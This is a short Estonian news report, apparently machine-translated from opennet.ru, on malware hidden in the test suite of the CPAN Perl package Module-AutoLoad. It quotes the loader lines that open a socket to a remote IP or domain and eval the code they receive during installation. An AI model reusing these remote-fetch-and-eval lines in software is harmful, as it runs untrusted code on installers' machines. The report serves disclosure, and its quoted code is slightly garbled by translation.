Perl-paketis Module-AutoLoad avastati pahavara

CPAN Perl-paketti kaudu jaotatavas Module-AutoLoad, mille eesmÀrk on automaatselt laadida CPAN-mooduleid jooksvalt, tuvastati kahjulik kood. Kahjulik sisestus oli leitud testikoodis 05_rcx.t, mis on saadaval alates 2011. aastast.
On mĂ€rkimisvÀÀrne, et kĂŒsimusi kahtlase koodi laadimise kohta on esitatud juba Stackoverflow 2016. aastal.

Kahjulik tegevus seisneb katsetes laadida ja kĂ€ivitada koodi kolmandast serverist (http://r.cx:1/) testikomplekti kĂ€itamise kĂ€igus, mis kĂ€ivitatakse mooduli installimise ajal. Eeldatakse, et algselt vĂ€lisest serverist laaditud kood ei olnud kahjulik, kuid nĂŒĂŒd suunatakse pĂ€ring domeenile ww.limera1n.com, mis annab vĂ€lja osa koodist kĂ€itamiseks.

Laadimise korraldamiseks failis 05_rcx.t kasutatakse jÀrgmist koodi:

my $prog = __FILE__;
$prog =~ s{[^\/]+\.t}{..\/contrib\/RCX.pl}x;
my $try = `$^X $prog`;

Esitatud kood viib skripti tÀitmiseni ..\/contrib\/RCX.pl, mille sisu koosneb jÀrgmistest ridadest:

use lib do{eval&&botstrap(«RCX»)if$b=new IO::Socket::INET 82.46.99.88.»:1″};

Antud skript laadib segmenteeritud kasutades teenust perlobfuscator.com koodi vÀlisest hostist r.cx (koodid 82.46.99.88 vastavad tekstile «R.cX») ja kÀivitab selle eval-blokis.

$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88.»:1″; print ;’
eval unpack u=>q{_<'I;G1[)&(];F5W($E/.CI3;V-K970Z.DE
.}

PÀrast puhastamist saavutatakse jÀrgmine kood:

print{$b=new IO::Socket::INET»ww.limera1n.com:80″}»GET /iJailBreak
«;evalor return warn$@while$b;1

Praegu on probleemne pakett eemaldatud hoidlalt PAUSE (Perl Authors Upload Server), ja tema mooduli autori konto on blokeeritud. Sellegipoolest jÀÀb moodul saadaval MetaCPAN arhiivis ja vÔib olla otse installitud MetaCPAN-ist mÔnede tööriistade abil, nagu cpanminus. MÀrgitakse, et pakett ei olnud laialdaselt levinud.

Huvi pakub arutelu ĂŒhendatud ja mooduli autor, kes kĂ”rvale heitis teate, et pahatahtlik kood oleks asetatud pĂ€rast tema saidi «r.cx» hĂ€kkimist ja selgitas, et ta lihtsalt lĂ”butses, ning et perlobfuscator.com kasutati mitte millegi varjamiseks, vaid koodi suuruse vĂ€hendamiseks ja selle lihtsalt kopeerimiseks lĂ”ikelauale. Funktsiooni nime «botstrap» valik on seletatud sellega, et see sĂ”na «kĂ”lab nagu bot ja on lĂŒhem kui bootstrap». Mooduli autor kinnitas ka, et tuvastatud manipulatsioonid ei tekitanud kahjulikku toimet, vaid nĂ€itasid lihtsalt koodi laadimist ja tĂ€itmist TCP kaudu.

Allikas: opennet.ru

Osta usaldusvÀÀrne veebihosting DDoS kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster